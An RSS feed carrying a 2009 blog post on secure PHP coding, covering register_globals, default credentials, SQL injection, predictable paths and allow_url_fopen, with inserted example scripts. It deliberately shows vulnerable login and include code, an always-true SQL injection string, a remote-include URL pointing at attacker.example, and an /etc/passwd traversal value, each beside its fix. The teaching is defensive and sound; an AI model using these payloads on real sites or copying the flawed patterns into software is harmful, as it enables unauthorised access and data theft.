<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Be a PHP Bee</title>
	<atom:link href="http://bephpbee.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://bephpbee.wordpress.com</link>
	<description></description>
	<lastBuildDate>Tue, 03 Nov 2009 10:45:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='bephpbee.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Be a PHP Bee</title>
		<link>http://bephpbee.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://bephpbee.wordpress.com/osd.xml" title="Be a PHP Bee" />
	<atom:link rel='hub' href='http://bephpbee.wordpress.com/?pushpress=hub'/>
		<item>
		<title>SECURED PHP CODING &#8211; Part One</title>
		<link>http://bephpbee.wordpress.com/2009/11/02/secured-php-coding-part-one/</link>
		<comments>http://bephpbee.wordpress.com/2009/11/02/secured-php-coding-part-one/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 11:45:20 +0000</pubDate>
		<dc:creator>bephpbee</dc:creator>
				<category><![CDATA[PHP security]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[security holes]]></category>
		<category><![CDATA[security PHP]]></category>
		<category><![CDATA[site compromise]]></category>
		<category><![CDATA[WRITING SECURE PHP]]></category>

		<guid isPermaLink="false">http://bephpbee.wordpress.com/?p=5</guid>
		<description><![CDATA[This article is about keeping a PHP web application as secure as possible. PHP is a widely used scripting language, and most developers pair it with MySQL because the two work together out of the box. PHP runs under almost every web server and operating system. List of [...]]]></description>
			<content:encoded><![CDATA[<p><em>This is an article about how to keep a web application as secure as possible while using PHP as the scripting language.</em> PHP is a widely used scripting language, and most developers pair it with MySQL, which works with PHP out of the box and is easy to talk to from PHP code. PHP runs under almost every web server and operating system.</p>
<p><strong>List of basic security issues</strong></p>
<ol>
<li> malicious data from users of the website</li>
<li>default credentials</li>
<li>SQL Injection</li>
<li>predictable path</li>
<li>allow_url_fopen</li>
</ol>
<p><strong>malicious data from users of the website</strong></p>
<p>First and foremost, if you want to write a secure web application, do not trust your users or anything they send to the site, because it may contain malicious content. It is not always a malicious user who triggers a security hole; problems arise just as easily when a user unintentionally does something wrong. Every piece of data from the user must be validated on the server. Client-side validation in JavaScript is fine for giving the user quick feedback, but it is only a convenience: anyone can bypass it with a different HTTP client, so it never replaces the server-side check.</p>
<p>In php.ini you will find <code>register_globals</code>. When it is on, every request parameter is turned into a global variable that is visible throughout the script, which opens a security hole. (The directive was deprecated in PHP 5.3 and removed in PHP 5.4, but older hosts may still have it on.) Consider this login check:</p>
<pre><code>&lt;?php
// Vulnerable with register_globals = On: $auth is only assigned on success,
// so a request to ?auth=1 creates $auth = "1" before this code runs.
if ($username == "john" &amp;&amp; $password == "password123")
{
    $auth = 1;
}

// ...later in the script...
if ($auth == 1)
{
    // privileged section
}
</code></pre>
<p>Here a malicious user can set <code>$auth</code> themselves by requesting <code>http://www.sitename.com?auth=1</code>, and the privileged section runs without a valid login.</p>
<p>The first, and best, fix is to set <code>register_globals</code> to off. The second is to use only variables you have explicitly set yourself. In the example above, that means adding <code>$auth = 0;</code> at the beginning of the script, so any value injected through the URL is overwritten before it is ever tested.</p>
<p>If you only want plain text from the user, you can remove tags and scripts from the input with <code>preg_replace</code> or <code>strip_tags</code> before using it. Do not rely on that as your defence against script injection, though: the reliable control is to encode the data at the point of output with <code>htmlspecialchars</code>, so that whatever the user typed is displayed as text rather than interpreted as HTML.</p>
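<p>The script below is an added example and is not code from the original post. It puts the three points above together in one place: initialising <code>$auth</code> yourself so <code>register_globals</code> cannot pre-set it, validating on the server with an allow-list, and encoding at output instead of trusting <code>strip_tags</code>. The request arrays, the fixed <code>john</code>/<code>password123</code> credentials and the function names are constructed for the example; it assumes PHP 7.1 or later.</p>

```php
<?php
// Added example (not part of the original post): handling user-supplied data
// without trusting it. Request data is simulated with constructed arrays so the
// script runs from the command line; in a real request use $_GET/$_POST directly.
// Assumes PHP 7.1 or later for the scalar and nullable type declarations.

// 1. Do not depend on register_globals being off: initialise every variable
//    yourself and read request data explicitly from the request array.
function authenticate(array $post): bool
{
    $auth = false; // set first, so nothing injected via ?auth=1 can pre-populate it
    $username = isset($post['username']) ? (string) $post['username'] : '';
    $password = isset($post['password']) ? (string) $post['password'] : '';

    // Fixed credentials as in the post's example (hypothetical); a real
    // application would compare against a stored password hash instead.
    if ($username === 'john' && $password === 'password123') {
        $auth = true;
    }
    return $auth;
}

// 2. Validate on the server. Client-side JavaScript can be bypassed by any
//    HTTP client, so it is only a convenience for the user. An allow-list of
//    permitted characters is stricter and easier to reason about than trying
//    to strip "bad" ones.
function validateUsername(string $value): ?string
{
    return preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $value) === 1 ? $value : null;
}

// 3. strip_tags() on input is lossy and easy to get wrong; the dependable
//    defence against injected HTML/JavaScript is to encode at the point of
//    output so the browser shows the text instead of interpreting it.
function renderGreeting(string $name): string
{
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Constructed sample requests: a normal login and a hostile one that also
// tries to smuggle in an "auth" parameter.
$normal  = ['username' => 'john', 'password' => 'password123'];
$hostile = ['username' => '<script>alert(1)</script>', 'password' => 'x', 'auth' => '1'];

foreach (['normal' => $normal, 'hostile' => $hostile] as $label => $request) {
    $name = validateUsername($request['username']);
    printf("%-8s login %s, username %s\n",
        $label,
        authenticate($request) ? 'accepted' : 'rejected',
        $name === null ? 'rejected by validation' : 'valid');
}

// Even if the hostile name had to be displayed, encoding makes it harmless:
echo renderGreeting($hostile['username']), "\n";
```

<p>The extra <code>auth</code> key in the hostile request is simply never read, because <code>authenticate()</code> only looks at the fields it expects and assigns <code>$auth</code> before testing anything. That is the habit the advice about "variables you have explicitly set yourself" is getting at, and it protects you whether or not <code>register_globals</code> happens to be on.</p>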
<p><strong>default credentials</strong></p>
<p>By default the MySQL administrative user is <code>root</code>, and its password may be empty. Before anything else, change these credentials to something unpredictable, and give the application its own MySQL user with only the privileges it needs rather than connecting as root. If your site is on a shared host, change the control panel and FTP credentials periodically as well. php.ini also lets you switch off PHP functions the site does not need through the <code>disable_functions</code> directive (for example <code>exec</code>, <code>shell_exec</code>, <code>system</code> and <code>passthru</code>), which limits what an attacker can do if they manage to run code on the server.</p>
<p><strong>SQL Injection</strong></p>
<p>The most common hazard when interacting with a database is SQL injection: a user exploits a flaw in how a query is built to run their own SQL against your database. Take a login system; a typical query looks like this:</p>
<pre><code>mysql_query("SELECT Username, Password FROM admin_access WHERE Username = '" . $_POST['txt_user'] . "' and Password = '" . $_POST['txt_pass'] . "'");
</code></pre>
<p>The MySQL engine executes this query and returns the row if the credentials match. But <code>txt_user</code> is a free text field, and a user can type SQL into it to compromise your site. Suppose they enter</p>
<p><strong>' OR 1=1 # </strong></p>
<p>in the username box (any condition that is always true will do). The query becomes</p>
<pre><code>SELECT Username, Password FROM admin_access WHERE Username = '' OR 1=1 # and Password = '123456'
</code></pre>
<p>So the condition is "username is empty OR 1=1", which is always true, and MySQL stops reading at the <code>#</code> because everything after it is a comment. The query therefore returns every row in <code>admin_access</code>, and since many developers keep the super-admin's details in the first record, the attacker lands straight in your admin area.</p>
<p>solution</p>
<pre><code>function check_login_input($value)
{
    // magic_quotes_gpc (removed in PHP 5.4) may already have added backslashes;
    // undo that so the value is not escaped twice
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // escape quotes and other special characters for the open MySQL connection
    // (mysql_real_escape_string() needs an active mysql_connect() link)
    $value = mysql_real_escape_string($value);
    return $value;
}

$username = check_login_input($_POST['txt_user']);
$password = check_login_input($_POST['txt_pass']);
$check = mysql_query("SELECT Username, Password FROM admin_access WHERE Username = '" . $username . "' and Password = '" . $password . "'");
</code></pre>
<div>Now, unless you happen to have a user with a very unusual username and a blank password, the attacker cannot do any damage with this query. Note that escaping only protects values that sit inside quotes in the SQL; a number or column name concatenated without quotes is still injectable, and the <code>mysql_*</code> functions themselves were removed in PHP 7. The robust approach is a prepared statement (PDO or MySQLi), which sends the query text and the values separately. Either way, check every piece of data passed to your database like this, however safe you think it is. HTTP headers sent by the user can be faked, the referrer can be faked, the browser's User-Agent string can be faked. Do not trust a single piece of data sent by the user, and you will be fine.</div>
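<div>The script below is an added example, not code from the original post. It places the injectable login query next to a parameterised one and runs the post's always-true payload against both. To run offline it uses an in-memory SQLite database through PDO with a constructed <code>admin_access</code> table; with MySQL the same code works with a <code>mysql:</code> DSN. One difference to note: the <code>#</code> comment marker in the post is MySQL syntax, so the payload here uses <code>--</code>, which SQLite understands.</div>

```php
<?php
// Added example (not part of the original post): the injectable login query
// beside a parameterised one. Uses an in-memory SQLite database via PDO so it
// runs offline; the table and rows are constructed for the example.

function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admin_access (Username TEXT, Password TEXT)');
    // Plaintext passwords are kept only to mirror the post's schema; a real
    // application stores a hash and checks it with password_verify().
    $db->exec("INSERT INTO admin_access VALUES ('superadmin', 's3cret'), ('john', 'password123')");
    return $db;
}

// Vulnerable: same structure as the post's mysql_query() call. The user's
// text is spliced into the SQL, so it can change what the query means.
function loginVulnerable(PDO $db, string $user, string $pass): array
{
    $sql = "SELECT Username, Password FROM admin_access WHERE Username = '" . $user
         . "' AND Password = '" . $pass . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: a prepared statement sends the SQL and the values separately, so the
// input is only ever treated as data. No escaping function is involved.
function loginSafe(PDO $db, string $user, string $pass): array
{
    $stmt = $db->prepare('SELECT Username, Password FROM admin_access WHERE Username = ? AND Password = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = setupDb();
$payload = "' OR 1=1 --";   // the post's "' OR a = a #", written with SQLite's comment marker

echo "vulnerable query, injected username: ", count(loginVulnerable($db, $payload, 'anything')), " row(s)\n";
echo "prepared statement, injected username: ", count(loginSafe($db, $payload, 'anything')), " row(s)\n";
echo "prepared statement, real credentials: ", count(loginSafe($db, 'john', 'password123')), " row(s)\n";
```

<div>In the vulnerable function the spliced text turns the WHERE clause into <code>Username = '' OR 1=1</code> and comments out the password check, so every row comes back; in the prepared statement the same text is compared literally against the <code>Username</code> column and matches nothing. When you do this against MySQL, also set <code>PDO::ATTR_EMULATE_PREPARES</code> to <code>false</code> so the binding is done by the server rather than by client-side escaping.</div>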
<div><strong>predictable path</strong></div>
<div>Do not use predictable directory names such as <code>includes</code>, <code>images</code> or <code>admin</code>. Attackers guess these folders first, and they may contain valuable files such as database connection code or something that discloses server details. Give included files a <code>.php</code> extension rather than <code>.inc</code>: the web server serves a <code>.inc</code> file as plain text, showing your username, password and database host in the browser, whereas a <code>.php</code> file is executed and only its output is displayed. Directory listing should be disabled for every folder (in Apache, <code>Options -Indexes</code> in the server configuration or <code>.htaccess</code>), and each folder should also contain an index file that redirects to an error page, so that an attacker cannot see the list of files in the directory.</div>
<div><strong>allow_url_fopen</strong></div>
<div>Unless the site really needs it, keep <code>allow_url_fopen</code> off. With it on, <code>fopen</code>, <code>file_get_contents</code> and similar functions accept URLs as well as local paths, so a script that passes user input into a file function can be made to fetch attacker-controlled content. The related <code>allow_url_include</code> directive (separate since PHP 5.2, and off by default) controls whether <code>include</code> and <code>require</code> accept URLs; if it is on and user input reaches an <code>include</code>, the attacker can run their own PHP on your server. Both are system-level directives, so they are set in php.ini or the web server's main configuration, not in <code>.htaccess</code>.</div>
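<div>The script below is an added example and not code from the original post. It shows the pattern that makes <code>allow_url_fopen</code> and <code>allow_url_include</code> dangerous, a user-controlled value reaching <code>include</code>, next to an include that maps the request to a fixed allow-list and checks the resolved path, so it stays safe whatever those directives are set to. The page names, the temporary directory and the helper function names are constructed for the example.</div>

```php
<?php
// Added example (not part of the original post): a user-controlled include
// beside an allow-listed one, plus a check of the two php.ini directives.

// Vulnerable pattern, shown for contrast and deliberately never called here.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt pulls in
// remote PHP; even with it Off, ?page=../../../etc/passwd reads local files.
function includeVulnerable(string $page): void
{
    include $page . '.php';
}

// Hardened: the request value is only a key into a fixed allow-list, and the
// resolved path is confirmed to lie under $baseDir before it is included.
function resolvePage(string $page, array $allowed, string $baseDir): ?string
{
    if (!isset($allowed[$page])) {
        return null; // unknown page: caller shows an error page, never the raw input
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowed[$page]);
    // realpath() resolves ".." and symlinks, so a prefix test on the result is reliable
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Report the relevant directives; both should be Off unless something in the
// application genuinely needs remote streams.
function remoteStreamSettings(): array
{
    return [
        'allow_url_fopen'   => (bool) ini_get('allow_url_fopen'),
        'allow_url_include' => (bool) ini_get('allow_url_include'),
    ];
}

// Constructed demo: a temporary directory holding one legitimate page.
$baseDir = sys_get_temp_dir() . '/pages_' . uniqid();
mkdir($baseDir);
file_put_contents($baseDir . '/home.php', "<?php echo \"home page rendered\\n\";");

$allowed = ['home' => 'home.php'];
$requests = ['home', '../../../etc/passwd', 'http://attacker.example/shell.txt'];

foreach ($requests as $req) {
    $resolved = resolvePage($req, $allowed, $baseDir);
    echo str_pad($req, 36), ' => ', $resolved === null ? 'rejected' : 'included', "\n";
    if ($resolved !== null) {
        include $resolved;
    }
}
print_r(remoteStreamSettings());

unlink($baseDir . '/home.php');
rmdir($baseDir);
```

<div>The allow-list means the two hostile requests are rejected before any filesystem or stream call is made, so the outcome does not depend on the php.ini settings at all. Turning <code>allow_url_fopen</code> off is still worth doing as defence in depth, but the code-level fix is never to build a path or URL from user input in the first place.</div>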
]]></content:encoded>
			<wfw:commentRss>http://bephpbee.wordpress.com/2009/11/02/secured-php-coding-part-one/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6730ad3b7ef55567e1e8ebc7bb5d3bc7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bephpbee</media:title>
		</media:content>
	</item>
	</channel>
</rss>
